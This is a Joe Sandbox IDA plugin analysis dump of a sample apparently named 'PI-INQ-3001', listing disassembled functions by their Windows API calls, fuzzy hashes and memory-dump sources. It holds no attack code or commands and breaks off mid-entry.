                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                          • String ID:
                                          • API String ID: 3016257755-0
                                          • Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                          • Instruction ID: cdbcc3682453d63bcd38f1d2efc5333f3b475aa1bb90730bb8a0d877438d3b8a
                                          • Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                          • Instruction Fuzzy Hash: 4C01807304415EFBCF125E84EC028EE3F62BF59345B099515FE9868031D237C9B1AB81
                                          APIs
                                          • GetWindowRect.USER32(?,?), ref: 00E7B59E
                                          • ScreenToClient.USER32(?,?), ref: 00E7B5B6
                                          • ScreenToClient.USER32(?,?), ref: 00E7B5DA
                                          • InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00E7B5F5
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: ClientRectScreen$InvalidateWindow
                                          • String ID:
                                          • API String ID: 357397906-0
                                          • Opcode ID: 2d26346d918d76b3f4f51bd06593398f0016b38d9cb31f40e69b961ae54c63fa
                                          • Instruction ID: 9ac24b32262de7a5ab32e65ea80771f624516f977b8f177a9ccd8deb055c11aa
                                          • Opcode Fuzzy Hash: 2d26346d918d76b3f4f51bd06593398f0016b38d9cb31f40e69b961ae54c63fa
                                          • Instruction Fuzzy Hash: 161146B5D00209EFDB41DF99C844AEEFBB5FB08310F108166E915E3220D735AA558F91
                                          APIs
                                          • _memset.LIBCMT ref: 00E7B8FE
                                          • _memset.LIBCMT ref: 00E7B90D
                                          • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00EB7F20,00EB7F64), ref: 00E7B93C
                                          • CloseHandle.KERNEL32 ref: 00E7B94E
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: _memset$CloseCreateHandleProcess
                                          • String ID:
                                          • API String ID: 3277943733-0
                                          • Opcode ID: 375c40c3920f6e556da4a6acae384414aff98198a5c7949f3e3f0dcf9c1c63ee
                                          • Instruction ID: d90e262a9605e4ad2318a12fa6d4ebed219799ccbd78344b9bf26a9ffed035dc
                                          • Opcode Fuzzy Hash: 375c40c3920f6e556da4a6acae384414aff98198a5c7949f3e3f0dcf9c1c63ee
                                          • Instruction Fuzzy Hash: 4EF054B16443007FE2106B72AC06FBB3A9CEB48354F005020FB4CF5591D771494487AC
                                          APIs
                                          • EnterCriticalSection.KERNEL32(?), ref: 00E56E88
                                            • Part of subcall function 00E5794E: _memset.LIBCMT ref: 00E57983
                                          • _memmove.LIBCMT ref: 00E56EAB
                                          • _memset.LIBCMT ref: 00E56EB8
                                          • LeaveCriticalSection.KERNEL32(?), ref: 00E56EC8
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: CriticalSection_memset$EnterLeave_memmove
                                          • String ID:
                                          • API String ID: 48991266-0
                                          • Opcode ID: 3e472ed7138dbb9e82c5619c376fcde6494c032c38c499a4048843cf399f86fe
                                          • Instruction ID: 15fcfaedfda9620484395ac795d77773f34839a776fa28617e94fd698b260c81
                                          • Opcode Fuzzy Hash: 3e472ed7138dbb9e82c5619c376fcde6494c032c38c499a4048843cf399f86fe
                                          • Instruction Fuzzy Hash: 23F0543A104200ABCF01AF55DC85E89BB6AEF49321B048065FE0C6E22BC731E995CBB4
                                          APIs
                                            • Part of subcall function 00DF12F3: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00DF134D
                                            • Part of subcall function 00DF12F3: SelectObject.GDI32(?,00000000), ref: 00DF135C
                                            • Part of subcall function 00DF12F3: BeginPath.GDI32(?), ref: 00DF1373
                                            • Part of subcall function 00DF12F3: SelectObject.GDI32(?,00000000), ref: 00DF139C
                                          • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 00E7C030
                                          • LineTo.GDI32(00000000,?,?), ref: 00E7C03D
                                          • EndPath.GDI32(00000000), ref: 00E7C04D
                                          • StrokePath.GDI32(00000000), ref: 00E7C05B
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                                          • String ID:
                                          • API String ID: 1539411459-0
                                          • Opcode ID: 53fc284ea9d5eaa10345811524949f9ef8498b38f6e89676dfe24ffc02bedaaf
                                          • Instruction ID: 0d13312d76f7bbe5aa12edaff36a2834224ab37fbb29c0d1f92d424fc14f05f7
                                          • Opcode Fuzzy Hash: 53fc284ea9d5eaa10345811524949f9ef8498b38f6e89676dfe24ffc02bedaaf
                                          • Instruction Fuzzy Hash: B1F0BE31001259FFDB12AF92AC0AFCE3F99AF05310F148100FA19311E2877905A8DBE5
                                          APIs
                                          • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00E4A399
                                          • GetWindowThreadProcessId.USER32(?,00000000), ref: 00E4A3AC
                                          • GetCurrentThreadId.KERNEL32 ref: 00E4A3B3
                                          • AttachThreadInput.USER32(00000000), ref: 00E4A3BA
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                          • String ID:
                                          • API String ID: 2710830443-0
                                          • Opcode ID: d35aa92fe266ac6a3ea7684ecbbc2f8bb881ca1850d71883d686fa79a20901f1
                                          • Instruction ID: b5ee894dc1fa05c041425f9ddad6df7fe6cb1ec48e7888fab3d80f15471358d1
                                          • Opcode Fuzzy Hash: d35aa92fe266ac6a3ea7684ecbbc2f8bb881ca1850d71883d686fa79a20901f1
                                          • Instruction Fuzzy Hash: 66E01571585228BADB209FA2EC0CEDB3F5CEF167A1F048034F509A4060D671C5848BE0
                                          APIs
                                          • GetSysColor.USER32(00000008), ref: 00DF2231
                                          • SetTextColor.GDI32(?,000000FF), ref: 00DF223B
                                          • SetBkMode.GDI32(?,00000001), ref: 00DF2250
                                          • GetStockObject.GDI32(00000005), ref: 00DF2258
                                          • GetWindowDC.USER32(?,00000000), ref: 00E2C0D3
                                          • GetPixel.GDI32(00000000,00000000,00000000), ref: 00E2C0E0
                                          • GetPixel.GDI32(00000000,?,00000000), ref: 00E2C0F9
                                          • GetPixel.GDI32(00000000,00000000,?), ref: 00E2C112
                                          • GetPixel.GDI32(00000000,?,?), ref: 00E2C132
                                          • ReleaseDC.USER32(?,00000000), ref: 00E2C13D
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
                                          • String ID:
                                          • API String ID: 1946975507-0
                                          • Opcode ID: 7d1044635f87f2f0187273a8efb6ec76509a4317e1a814b306eee69b6f3283e7
                                          • Instruction ID: 2a4ff6142d7536d56efe9c88318d869761c0142c16fd4000837fcb405820f37a
                                          • Opcode Fuzzy Hash: 7d1044635f87f2f0187273a8efb6ec76509a4317e1a814b306eee69b6f3283e7
                                          • Instruction Fuzzy Hash: 1BE03031104144EEDB219F65FC097D83B10AB05336F148366FA6D680E2877149D4DB11
                                          APIs
                                          • GetCurrentThread.KERNEL32 ref: 00E48C63
                                          • OpenThreadToken.ADVAPI32(00000000,?,?,?,00E4882E), ref: 00E48C6A
                                          • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,00E4882E), ref: 00E48C77
                                          • OpenProcessToken.ADVAPI32(00000000,?,?,?,00E4882E), ref: 00E48C7E
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: CurrentOpenProcessThreadToken
                                          • String ID:
                                          • API String ID: 3974789173-0
                                          • Opcode ID: 553b2e9da291a8a121da9285746516fa2d1b28616f3beba0db78c38e7b4605cb
                                          • Instruction ID: 24df3ea4c94ac01a4215e7639cda1b4d175aa79ecf4471d672d97ed21d7a807a
                                          • Opcode Fuzzy Hash: 553b2e9da291a8a121da9285746516fa2d1b28616f3beba0db78c38e7b4605cb
                                          • Instruction Fuzzy Hash: E3E08636A42211EFD7209FB26E0CB5A7BACFF50797F054828F249EA050DA3484C9CB61
                                          APIs
                                          • GetDesktopWindow.USER32 ref: 00E32187
                                          • GetDC.USER32(00000000), ref: 00E32191
                                          • GetDeviceCaps.GDI32(00000000,0000000C), ref: 00E321B1
                                          • ReleaseDC.USER32(?), ref: 00E321D2
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: CapsDesktopDeviceReleaseWindow
                                          • String ID:
                                          • API String ID: 2889604237-0
                                          • Opcode ID: 81c86b2dc56fed90d888f8df99eb9342c69c1032f5a77e2540432698b3003d22
                                          • Instruction ID: b55bc0b5d4460c220bf897069e024c7e2fe0434eca531368be0552405b0bc9a8
                                          • Opcode Fuzzy Hash: 81c86b2dc56fed90d888f8df99eb9342c69c1032f5a77e2540432698b3003d22
                                          • Instruction Fuzzy Hash: CDE0E575804208EFDB019FA1D908AAD7BB1EB4C350F118429FA5AA7220CB7881869F90
                                          APIs
                                          • GetDesktopWindow.USER32 ref: 00E3219B
                                          • GetDC.USER32(00000000), ref: 00E321A5
                                          • GetDeviceCaps.GDI32(00000000,0000000C), ref: 00E321B1
                                          • ReleaseDC.USER32(?), ref: 00E321D2
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: CapsDesktopDeviceReleaseWindow
                                          • String ID:
                                          • API String ID: 2889604237-0
                                          • Opcode ID: a15b1a58e9bb5f9b8f5dd7a165226b0a5f79c5511f0da001d82ca491039d1e50
                                          • Instruction ID: 75f1129b4b212deceee43eb26a99c79d46730b0246f455774b07f9e70f0a44b6
                                          • Opcode Fuzzy Hash: a15b1a58e9bb5f9b8f5dd7a165226b0a5f79c5511f0da001d82ca491039d1e50
                                          • Instruction Fuzzy Hash: A9E0E575804208AFCB019FA1D8086AD7BA1EB4C310F118025F95AA7220CB7891859F90
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: %
                                          • API String ID: 0-2291192146
                                          • Opcode ID: d7ef6a595d76ac96315d9689c7cf93235aacacc3bb48fffdfaea970c91854da2
                                          • Instruction ID: ffd48995d1de5f09f5d205d4d48d29f3efa0002fd53d3a9443a59807288ce315
                                          • Opcode Fuzzy Hash: d7ef6a595d76ac96315d9689c7cf93235aacacc3bb48fffdfaea970c91854da2
                                          • Instruction Fuzzy Hash: EAB19D7180420DAACF14EF98C8819FEB7B5EF44310F56C06AEB42A7695DA30DE85CB71
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: __itow_s
                                          • String ID: xr$xr
                                          • API String ID: 3653519197-2528877900
                                          • Opcode ID: 4e3f2bae5f428ef51a062cc65c82f6304ffb9cb7ddab50fd136709ba6d50744b
                                          • Instruction ID: 72a96a91174b07d13276ae680c57cf35dc01ba2662bf0989500827b019ca4f01
                                          • Opcode Fuzzy Hash: 4e3f2bae5f428ef51a062cc65c82f6304ffb9cb7ddab50fd136709ba6d50744b
                                          • Instruction Fuzzy Hash: 5EB18E70A40109ABCB14DF54D891EFAB7B9EF58344F149459FA45EB292EB30E981CB60
                                          APIs
                                            • Part of subcall function 00E0FEC6: _wcscpy.LIBCMT ref: 00E0FEE9
                                            • Part of subcall function 00DF9997: __itow.LIBCMT ref: 00DF99C2
                                            • Part of subcall function 00DF9997: __swprintf.LIBCMT ref: 00DF9A0C
                                          • __wcsnicmp.LIBCMT ref: 00E5B298
                                          • WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 00E5B361
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: Connection__itow__swprintf__wcsnicmp_wcscpy
                                          • String ID: LPT
                                          • API String ID: 3222508074-1350329615
                                          • Opcode ID: b5f1d2f90bee764537e2acf7b08b2d6181bc8545cbbd3eeb73ba311fa77bd58d
                                          • Instruction ID: 895ca15f584755119fbd118a0cd73eacd72fe7eaa75661eba43bc75fd74c1661
                                          • Opcode Fuzzy Hash: b5f1d2f90bee764537e2acf7b08b2d6181bc8545cbbd3eeb73ba311fa77bd58d
                                          • Instruction Fuzzy Hash: 43616E75E00219AFCB14DF94C891EAEB7B4EB08315F119469F946BB291DB70AE84CB60
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: _memmove
                                          • String ID: Oa
                                          • API String ID: 4104443479-3945284152
                                          APIs
                                          • Sleep.KERNEL32(00000000), ref: 00E02AC8
                                          • GlobalMemoryStatusEx.KERNEL32(?), ref: 00E02AE1
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: GlobalMemorySleepStatus
                                          • String ID: @
                                          • API String ID: 2783356886-2766056989
                                          APIs
                                            • Part of subcall function 00DF506B: __fread_nolock.LIBCMT ref: 00DF5089
                                          • _wcscmp.LIBCMT ref: 00E59AAE
                                          • _wcscmp.LIBCMT ref: 00E59AC1
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: _wcscmp$__fread_nolock
                                          • String ID: FILE
                                          • API String ID: 4029003684-3121273764
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: ClearVariant
                                          • String ID: Dt$Dt
                                          • API String ID: 1473721057-4168040075
                                          APIs
                                          • _memset.LIBCMT ref: 00E62892
                                          • InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 00E628C8
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: CrackInternet_memset
                                          • String ID: |
                                          • API String ID: 1413715105-2343686810
                                          APIs
                                          • DestroyWindow.USER32(?,?,?,?), ref: 00E76D86
                                          • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 00E76DC2
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: Window$DestroyMove
                                          • String ID: static
                                          • API String ID: 2139405536-2160076837
                                          APIs
                                          • _memset.LIBCMT ref: 00E52E00
                                          • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00E52E3B
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: InfoItemMenu_memset
                                          • String ID: 0
                                          • API String ID: 2223754486-4108050209
                                          APIs
                                          • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00E769D0
                                          • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00E769DB
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: MessageSend
                                          • String ID: Combobox
                                          • API String ID: 3850602802-2096851135
                                          APIs
                                            • Part of subcall function 00DF1D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00DF1D73
                                            • Part of subcall function 00DF1D35: GetStockObject.GDI32(00000011), ref: 00DF1D87
                                            • Part of subcall function 00DF1D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00DF1D91
                                          • GetWindowRect.USER32(00000000,?), ref: 00E76EE0
                                          • GetSysColor.USER32(00000012), ref: 00E76EFA
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: Window$ColorCreateMessageObjectRectSendStock
                                          • String ID: static
                                          • API String ID: 1983116058-2160076837
                                          APIs
                                          • GetWindowTextLengthW.USER32(00000000), ref: 00E76C11
                                          • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 00E76C20
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: LengthMessageSendTextWindow
                                          • String ID: edit
                                          • API String ID: 2978978980-2167791130
                                          APIs
                                          • _memset.LIBCMT ref: 00E52F11
                                          • GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 00E52F30
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: InfoItemMenu_memset
                                          • String ID: 0
                                          • API String ID: 2223754486-4108050209
                                          APIs
                                          • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 00E62520
                                          • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00E62549
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: Internet$OpenOption
                                          • String ID: <local>
                                          • API String ID: 942729171-4266983199
                                          APIs
                                            • Part of subcall function 00E6830B: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,00E680C8,?,00000000,?,?), ref: 00E68322
                                          • inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 00E680CB
                                          • htons.WSOCK32(00000000,?,00000000), ref: 00E68108
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          Joe Sandbox IDA Plugin
